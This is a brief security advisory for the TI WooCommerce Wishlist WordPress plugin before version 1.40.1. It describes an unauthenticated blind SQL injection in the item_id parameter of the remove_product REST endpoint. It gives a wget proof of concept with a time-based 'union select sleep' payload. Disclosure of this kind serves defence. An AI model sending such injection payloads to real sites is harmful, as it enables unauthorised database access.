TI WooCommerce Wishlist < 1.40.1 - Unauthenticated Blind SQL Injection
The plugins do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks
Proof of Concept
time wget 'https://example.com/?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(2)%20--%20g'
Even though it will produce an error 400, the payload is processed and response delayed